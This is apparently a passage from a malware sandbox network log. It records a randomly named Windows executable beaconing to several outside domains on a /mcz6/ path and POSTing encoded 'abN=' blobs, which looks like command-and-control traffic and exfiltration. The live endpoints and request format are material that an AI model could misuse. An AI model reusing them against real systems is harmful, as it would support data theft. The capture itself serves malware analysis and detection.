56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 32 31 2b 55 6e 2f 2f 42 7a 34 51 39 75 78 59 58 48 66 55 53 65 4e 32 4c 61 36 50 2f 55 4d 6e 45 63 66 7a 45 59 2b 4d 2f 64 63 6a 34 56 31 4a 73 56 46 33 68 43 77 58 45 65 53 50 39 47 38 63 39 55 47 48 77 38 41 4e 51 2b 41 47 77 72 6c 62 53 4f 78 30 72 43 63 76 7a 57 2b 67 70 6a 34 6a 76 67 54 55 49 70 49 39 38 66 6e 35 51 6b 79 56 34 75 6d 4f 45 45 37 63 36 48 4b 54 33 49 64 45 52 69 54 4b 4b 45 71 4d 54 63 4b 71 44 6f 65 65 73 6d 4d 4f 54 2f 67 72 73 56 78 78 52 44 6b 52 4b 2f 39 75 53 35 [TRUNCATED] Data Ascii: abN=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5OFm9VPsHDzhp/BOq9a2c5G+MhBmzS5GcRpCwIaK5ZkFtrvcMGKI5N3dZSFNAMAU0a7ctYCQ0rLDuCZDx3UDbAWmfsAPqIVwTMFzmCzuh12Yu0XdtjBC0OaBx6xGL4IS21+Un//Bz4Q9uxYXHfUSeN2La6P/UMnEcfzEY+M/dcj4V1JsVF3hCwXEeSP9G8c9UGHw8ANQ+AGwrlbSOx0rCcvzW+gpj4jvgTUIpI98fn5QkyV4umOEE7c6HKT3IdERiTKKEqMTcKqDoeesmMOT/grsVxxRDkRK/9uS5McNu24f5Oh6xP3M+yzd5yLAcBtRZPhxiAR8JMMddaXwrcUZh8t45pwso/pb9LqRD62oKM4mHmatekqATO/7g1+x1UAL/Cj+YfOqiS1uEc0DwSGqBVYzyDqPfLqEWjL57+szTki5Dy79py+ZfiQ2+xZTn/mhwy7DEuC9wbtlNdZaC5SH1m0aA+eY44qdghPqXpl1O7aYEP5EUrbiEObf3hDyM4HP0f0K0vPvc8u/DyryQ7K+7ElctIKBQgE/rmSpyl5XucGbuMN9uKBpzdgPIMQcELwuTr3wdivZZmUZIOo1BhQMQc8GBDHI38/15DaaYZ/XAtr2BcTDRyEOuczbivRN0iGlCexnsGIAqujqpk50V8vSt5UdhjYo483hhRuJWwIPFPO0WixevAZVAPGzCyk5bDwFYXtIlVGbOf6h7WEj/rRBVBxejRETLpxfXOAyK6dz2BIQHhewvmdodHJnWOz6MYSJ07hfwh5iNNZ7f4A9YycstJFZCRosfR40DuV7AnRPzFYPqxzQd+X9IkBQBDhM5LMK22ChZ0WLQ6thdH4LK+XtGVnpvHRwKb6s2lj4szBNwJiGK7h0TZOU1tc5IONnw7a7EQm/bYKr+p50SR6A3ahIUJAdyz0auO8VwDOwaRgV+/FxMiJ7/+beZnY9w5gJKYyheUWpgG9 [TRUNCATED]
Jun 5, 2024 15:05:56.936400890 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:05:56 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:05:58.796005011 CEST	481	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:05:59.453088045 CEST	494	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:05:59 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:05.546931982 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: abN=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 5, 2024 15:06:06.204504013 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:06 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:08.076787949 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 5, 2024 15:06:08.738002062 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:08 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:10.620604992 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f 36 6e 57 47 4f [TRUNCATED] Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRUBooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+E3Q89 [TRUNCATED]
Jun 5, 2024 15:06:11.280859947 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:11 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:13.156898022 CEST	479	OUT	GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:06:13.844326973 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:13 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	217.160.0.111	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:19.085370064 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4e 62 45 38 56 56 65 51 73 41 70 76 48 6c 35 75 76 6e 39 64 69 5a 78 70 34 6e 66 30 50 48 37 5a 52 65 56 68 59 79 79 61 43 32 62 52 38 4b 2f 4d 5a 64 49 39 47 77 59 6a 43 6f 30 77 38 32 45 72 6c 55 48 65 4e 4c 7a 50 58 47 30 36 48 66 39 72 66 79 6d 46 62 34 32 61 69 6e 62 57 56 61 76 45 4d 71 32 72 4d 47 31 70 70 42 64 30 37 51 49 43 50 4f 63 62 63 75 75 42 6c 7a 71 67 71 6c 39 72 71 70 34 45 70 36 30 45 6c 67 52 37 71 37 30 4e 43 58 76 4c 68 37 57 76 71 6a 6d 56 6b 2f 72 47 65 37 30 38 57 54 30 63 33 2f 55 6c 36 4c 62 48 4a 78 31 42 76 67 3d 3d Data Ascii: abN=g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9rqp4Ep60ElgR7q70NCXvLh7WvqjmVk/rGe708WT0c3/Ul6LbHJx1Bvg==
Jun 5, 2024 15:06:19.913511992 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:06:19 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] 